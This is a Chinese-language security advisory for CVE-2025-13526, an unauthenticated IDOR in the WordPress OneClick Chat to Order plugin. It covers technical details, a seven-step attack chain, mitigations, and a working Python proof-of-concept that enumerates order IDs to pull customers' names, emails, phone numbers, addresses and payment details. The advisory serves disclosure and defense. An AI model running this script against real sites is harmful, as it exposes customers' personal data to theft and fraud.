CVE-2025-13526 WordPress OneClick Chat to Order插件IDOR漏洞

漏洞信息

漏洞编号

CVE-2025-13526

漏洞类型

不安全的直接对象引用(IDOR)

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WordPress OneClick Chat to Order插件

漏洞概述

CVE-2025-13526是WordPress OneClick Chat to Order插件中的一个高危安全漏洞。该插件是一款用于在WhatsApp上接收订单的WordPress插件。漏洞存在于wa_order_thank_you_override函数中，由于缺少对用户控制键的验证，导致存在不安全的直接对象引用(IDOR)问题。攻击者无需任何认证，只需通过修改URL中的订单ID参数，即可绕过授权检查，访问任意订单的敏感信息。这些信息包括客户姓名、电子邮件地址、电话号码、账单地址、收货地址、订单内容和支付方式等。该漏洞影响插件1.0.8及以下所有版本，CVSS评分7.5，属于高危漏洞。建议用户立即升级到最新版本1.0.9以修复此安全问题。

技术细节

该漏洞的根本原因在于wa_order_thank_you_override函数未对用户提交的订单ID参数进行充分的权限验证。在正常的业务逻辑中，用户应该只能查看自己订单的详细信息。然而，由于插件开发时未实施适当的访问控制检查，攻击者可以通过简单地修改URL中的订单ID参数（如order_id=123改为order_id=124）来访问其他客户的订单数据。漏洞代码位于wa-order-thank-you.php文件的第126行附近，函数直接使用用户输入的ID参数从数据库中检索订单信息，而没有验证当前用户是否有权访问该订单。这种IDOR漏洞允许未经身份验证的攻击者枚举并获取所有订单的敏感信息，包括完整的客户资料和交易详情。攻击者可以利用这些信息进行身份盗窃、欺诈或其他恶意活动。

攻击链分析

STEP 1

步骤1

攻击者访问目标WordPress网站上使用OneClick Chat to Order插件的电商页面

STEP 2

步骤2

攻击者完成一个正常的订单流程，获取订单确认页面的URL

STEP 3

步骤3

攻击者拦截请求或直接修改URL中的order_id参数值，将订单ID从当前值改为其他数字

STEP 4

步骤4

由于wa_order_thank_you_override函数缺少IDOR验证，服务器直接返回目标订单的详细信息

STEP 5

步骤5

攻击者成功获取目标订单的客户姓名、邮箱、电话、地址、订单内容和支付方式等敏感信息

STEP 6

步骤6

攻击者通过遍历不同的order_id值，批量获取大量客户的订单数据

STEP 7

步骤7

攻击者利用窃取的敏感信息进行身份盗窃、欺诈交易或其他恶意活动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-13526 PoC - OneClick Chat to Order IDOR Vulnerability
import requests

TARGET_URL = "https://vulnerable-site.com/"
# The thank you page endpoint that handles order display
VULNERABLE_ENDPOINT = "?wa-order-thank-you=1&order_id="

def exploit_idor(start_order_id=1, max_orders=100):
    """Exploit IDOR vulnerability to extract customer order information"""
    print(f"[*] Starting IDOR attack on {TARGET_URL}")
    print(f"[*] Target: OneClick Chat to Order Plugin")
    print(f"[*] Vulnerability: Insecure Direct Object Reference in wa_order_thank_you_override\n")
    
    for order_id in range(start_order_id, start_order_id + max_orders):
        url = f"{TARGET_URL}{VULNERABLE_ENDPOINT}{order_id}"
        
        try:
            response = requests.get(url, timeout=10)
            
            if response.status_code == 200:
                # Check if sensitive data is leaked in response
                if any(keyword in response.text.lower() for keyword in 
                       ['customer', 'order', 'email', 'phone', 'address', 'payment']):
                    print(f"[+] SUCCESS: Order ID {order_id} - Sensitive data exposed!")
                    print(f"[+] URL: {url}")
                    # Extract and display leaked information
                    print(f"[*] Response length: {len(response.text)} bytes")
                else:
                    print(f"[-] Order ID {order_id} - No sensitive data found")
            else:
                print(f"[x] Order ID {order_id} - HTTP {response.status_code}")
                
        except requests.exceptions.RequestException as e:
            print(f"[x] Error accessing order {order_id}: {e}")
    
    print("\n[*] Attack completed. All accessible order data has been enumerated.")

if __name__ == "__main__":
    exploit_idor(start_order_id=1, max_orders=100)
    # Note: This PoC demonstrates the IDOR vulnerability where attackers can
    # view any customer's order information by simply changing the order_id parameter
    # No authentication required - just network access to the vulnerable endpoint

影响范围

OneClick Chat to Order插件 <= 1.0.8（所有版本）

防御指南

临时缓解措施

如果无法立即升级插件，可采取以下临时缓解措施：1) 临时禁用订单确认页面功能；2) 使用Web应用防火墙阻止对?wa-order-thank-you参数的直接访问；3) 限制该插件的访问权限，仅允许注册用户访问；4) 联系WordPress安全社区获取临时补丁。但最有效的解决方案仍然是尽快升级到插件的最新版本1.0.9。